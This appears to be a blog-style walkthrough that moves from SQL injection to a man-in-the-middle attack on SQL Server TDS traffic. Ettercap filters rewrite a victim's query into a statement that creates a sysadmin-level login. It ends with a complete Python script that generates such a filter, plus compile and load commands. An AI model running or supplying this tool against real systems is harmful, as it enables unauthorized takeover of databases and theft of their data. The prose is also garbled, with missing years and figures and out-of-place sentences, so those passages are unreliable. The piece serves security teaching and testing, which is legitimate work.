One of the best places to start is the most infamous software weakness of all: SQL injection. At some point in , according to X-Force research, SQL injection attacks were responsible for more than half of all data breaches where the attack type had been disclosed. While that share has decreased in , it remains one of the main attack vectors in use.
In , cybercriminals made off with information from as many as million debit and credit cards in the Heartland Payment Systems data breach. At the time it was the largest data breach ever recorded, and SQL injection was the culprit. SQL injection is introduced when a developer concatenates user input directly into a database query. The classic case is a login check that selects from the users table any record matching the submitted username and password, with both values pasted straight into the query string. Leaving aside the fact that the password is stored in cleartext, the input is parsed as part of the SQL statement rather than treated as data, so the user can reshape the query into something the developer never intended, which is never good.
The test database is called testdb and contains a single table, Products. The table holds no rows, which does not matter for this test. The query used throughout simply selects everything from that table. It executed successfully and returned the empty table to me.
You can see the empty columns listed toward the bottom-right of the screenshot. Switching back to Wireshark, I stopped the capture and looked at the captured data. I spotted one TDS query packet, and clicking on it showed all of the data it contained, down to the carriage return and newline characters. Something interesting to notice is that a null byte (hexadecimal 0x00) sits between every character of the query. This is normal: TDS carries the SQL batch text as UCS-2 (little-endian, two bytes per character), so every ASCII character is followed by 0x00. The nulls are only noticeable in the raw bytes in the bottom pane; Wireshark renders them as period characters in the text column, but they really are null bytes. Now that I knew what the data looked like on the wire, I could try to find a way to manipulate it.
I decided to use Ettercap, a tool built specifically for performing MITM attacks. It also has a nifty built-in feature called Ettercap filters. A filter lets me search the intercepted packets for specific data and then manipulate it: you write the filter, compile it, and load it into Ettercap, which then rewrites the data every time it finds a match. The functionality is somewhat limited, but it is enough for a proof of concept. Filters are written in a simple scripting language, and the two functions I needed were search and replace. The search function tests whether a given byte string occurs in the packet payload. The replace function finds a byte string in the payload and overwrites it with another. That was the key to this project.
Since the TDS query data includes those null bytes, some of the characters in the query are not printable. This meant that I could not simply search for a plain string and replace it with another: the search pattern has to include the 0x00 bytes, and I cannot type a null byte on a keyboard. I therefore needed a way to express the query in hexadecimal. Kali includes a program called hexdump that does exactly that, converting a string to its hex bytes.
The first line restricts the filter to TCP traffic whose destination port is the SQL Server listener. If that matches, the filter prints a debugging message to the console to let me know that it found SQL traffic. It then searches the payload for the hex-encoded query string and, if it finds it, prints another debugging message. Finally, the magic happens: the matched bytes are replaced. This first version was just a test to see if the script would run properly. It is important to note that when you replace data in a TCP packet, you must replace it with exactly the same number of bytes. If the payload length changes, the sequence and acknowledgement numbers seen by the two endpoints no longer line up and the TCP connection will break. Once the filter is written, it must be compiled into a binary filter file, which is easily done with the etterfilter command. There were no errors, so the filter was ready for testing.
I fired up Wireshark and verified that I was seeing traffic flowing between the two victims, the workstation and the SQL Server. Everything was looking positive. The next step was to switch back to the workstation and execute the query again. This time I did not receive the empty table I had received originally; instead, I received an error from the server.
The filter had worked exactly as expected, a step in the right direction. The next step was to replace the entire query string with something that would help me as the attacker. I decided to try to add a login to the server. That is pretty much the best possible outcome for an attacker, especially since in this case the workstation victim connects as the SA user, so any statement injected into its session runs with sysadmin privileges.
After converting everything to hex, I updated the mssql. filter file with the new search and replacement strings. I mentioned earlier that you must replace TCP data with exactly the same amount of data. So how did I handle that, given that my new query is shorter than the original? I simply padded the end of the new query with spaces, each surrounded by null bytes like every other character, until the lengths matched. I compiled the filter just like before, loaded it into Ettercap, and submitted the query from the workstation again. Notice the difference between this response and the one before I used the Ettercap filter?
Originally, the query returned an empty table. This time, no table was returned at all: the statement that actually reached the server creates a login rather than selecting rows, so there is no result set to display. Unfortunately, they would be too late.
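The steps above (working out the null-byte layout of the query on the wire, converting it to a hex form the filter can match, building the search/replace filter, and padding the shorter replacement so the TCP payload length does not change) can be done in one place. The following is an added example, not the author's filter or Ettercap's own code: a Python script that encodes the text the way TDS carries it (UCS-2, which is why a 0x00 follows every ASCII character), renders it as \xNN escapes, pads the replacement with spaces to the original length, and writes out an Ettercap filter. The two queries, the login name and password inside the replacement, and the port (1433, the default SQL Server listener) are assumptions made for the demonstration.

```python
# Added example: generate an Ettercap filter that rewrites one SQL Server query
# into another inside TDS traffic. Assumptions (not from the original post):
# the server listens on the default port 1433, the client sends a plain SQL
# batch whose text is UCS-2 / UTF-16-LE encoded, and etterfilter accepts \xNN
# escapes in string literals.

TDS_PORT = 1433  # assumed default SQL Server listener

# Constructed queries for the demonstration. The replacement is shorter than
# the original, which is the case the padding step has to handle.
ORIGINAL_QUERY = "SELECT ProductID, ProductName, Price FROM Products"
REPLACEMENT_QUERY = "CREATE LOGIN evil WITH PASSWORD='Pa55w0rd!'"

def tds_encode(text: str) -> bytes:
    """Encode query text as TDS carries it: UTF-16-LE, so 'S' becomes 53 00."""
    return text.encode("utf-16-le")

def to_filter_hex(data: bytes) -> str:
    """Render bytes as the \\xNN escapes usable in an Ettercap filter string."""
    return "".join(f"\\x{b:02x}" for b in data)

def pad_replacement(original: str, replacement: str) -> str:
    """Pad the replacement with spaces so both encode to the same byte length.

    Each padding space is itself UTF-16-LE encoded (20 00), so the nulls keep
    surrounding every character exactly as the client would have sent them.
    """
    orig_len = len(tds_encode(original))
    repl_len = len(tds_encode(replacement))
    if repl_len > orig_len:
        raise ValueError("replacement is longer than the original query")
    return replacement + " " * ((orig_len - repl_len) // 2)

def build_filter(original: str, replacement: str, port: int = TDS_PORT) -> str:
    """Emit the filter text: match the port, find the query, overwrite it."""
    padded = pad_replacement(original, replacement)
    search_hex = to_filter_hex(tds_encode(original))
    replace_hex = to_filter_hex(tds_encode(padded))
    return (
        f"if (ip.proto == TCP && tcp.dst == {port}) {{\n"
        f'    msg("TDS traffic to SQL Server seen\\n");\n'
        f'    if (search(DATA.data, "{search_hex}")) {{\n'
        f'        msg("original query matched, rewriting\\n");\n'
        f'        replace("{search_hex}", "{replace_hex}");\n'
        f"    }}\n"
        f"}}\n"
    )

if __name__ == "__main__":
    print(build_filter(ORIGINAL_QUERY, REPLACEMENT_QUERY))
```

Save the output to a file, compile it with etterfilter (for example `etterfilter mssql.filter -o mssql.ef`) and load it into Ettercap with `-F mssql.ef`, as the article describes. The equal-length check is the important part: pad_replacement refuses a replacement that would lengthen the payload instead of silently producing a filter that breaks the connection.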